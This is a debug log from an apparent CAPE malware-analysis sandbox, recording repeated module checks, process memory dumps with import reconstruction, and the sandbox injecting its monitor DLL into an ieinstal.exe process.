2020-03-24 10:13:50,354 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,368 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,415 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,431 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,431 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,447 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,463 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,493 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,493 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,493 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,525 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,540 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,572 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,588 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,602 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,602 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,602 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,650 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,665 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,665 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,665 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,665 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,697 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,727 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,759 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,759 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,759 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,759 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,775 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,775 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,775 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,775 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,805 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,822 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:13:50,822 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:13:50,822 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:13:50,822 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\duser.dll
2020-03-24 10:13:50,822 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\duser.dll
2020-03-24 10:13:50,836 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:13:50,836 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:13:50,852 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:13:50,852 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:13:50,852 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x4AAD0000
2020-03-24 10:13:50,852 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x4AAD829A
2020-03-24 10:13:50,868 [root] DEBUG: Module image dump success
2020-03-24 10:13:50,868 [root] DEBUG: DumpProcessFixImports: Found IAT - 0x4aad0ffc, size: 0x3a4
2020-03-24 10:13:50,884 [root] DEBUG: IAT parsing finished, found 229 valid APIs, missed 0 APIs
2020-03-24 10:13:50,884 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:50,884 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:50,884 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:50,900 [root] DEBUG: Adding module to module list: winbrand.dll
2020-03-24 10:13:50,900 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:50,914 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:50,930 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:50,961 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\2444_103054258250132024232020
2020-03-24 10:13:51,305 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\2444.dmp.
2020-03-24 10:13:51,321 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:51,321 [root] DEBUG: DLL unloaded from 0x74940000.
2020-03-24 10:13:51,335 [root] INFO: Notified of termination of process with pid 2444.
2020-03-24 10:13:51,648 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:51,664 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:51,664 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:51,680 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:51,680 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:51,710 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:51,726 [root] DEBUG: Loader: Injecting process 1540 (thread 2160) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,742 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:51,742 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,757 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:51,757 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,773 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:51,835 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:51,835 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:51,835 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:51,851 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:51,851 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:51,851 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:51,867 [root] DEBUG: Loader: Injecting process 1540 (thread 2160) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,867 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:51,867 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,881 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:51,881 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,898 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:51,898 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:51,898 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:51,914 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:51,914 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:51,914 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:51,928 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:51,928 [root] DEBUG: Loader: Injecting process 1540 (thread 0) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,960 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2160, handle 0x9c
2020-03-24 10:13:51,960 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:51,960 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,976 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:51,992 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:51,992 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,006 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:52,006 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:52,006 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:52,006 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:52,023 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:52,023 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:52,023 [root] DEBUG: Loader: Injecting process 1540 (thread 0) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,038 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2160, handle 0x9c
2020-03-24 10:13:52,038 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:52,053 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,053 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:52,069 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,085 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,101 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:52,115 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:52,115 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:52,115 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:52,115 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:52,131 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:52,131 [root] DEBUG: Loader: Injecting process 1540 (thread 0) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,131 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2160, handle 0x9c
2020-03-24 10:13:52,148 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:52,148 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,148 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:52,163 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,163 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,163 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:52,163 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:52,178 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:52,178 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:52,178 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:52,178 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:52,194 [root] DEBUG: Loader: Injecting process 1540 (thread 1424) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,194 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:52,210 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00430000 (context EP 0x000F0000)
2020-03-24 10:13:52,210 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,210 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:52,210 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,226 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,335 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:52,335 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:52,349 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:52,349 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:52,349 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:52,349 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:52,365 [root] DEBUG: Loader: Injecting process 1540 (thread 0) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,365 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2160, handle 0x9c
2020-03-24 10:13:52,365 [root] DEBUG: Process image base: 0x00430000
2020-03-24 10:13:52,365 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,381 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:52,381 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:52,381 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1540
2020-03-24 10:13:52,381 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:52,381 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:52,381 [root] INFO: Announced 32-bit process name: ieinstal.exe pid: 1540
2020-03-24 10:13:52,397 [root] DEBUG: Import reconstruction of process dumps enabled.
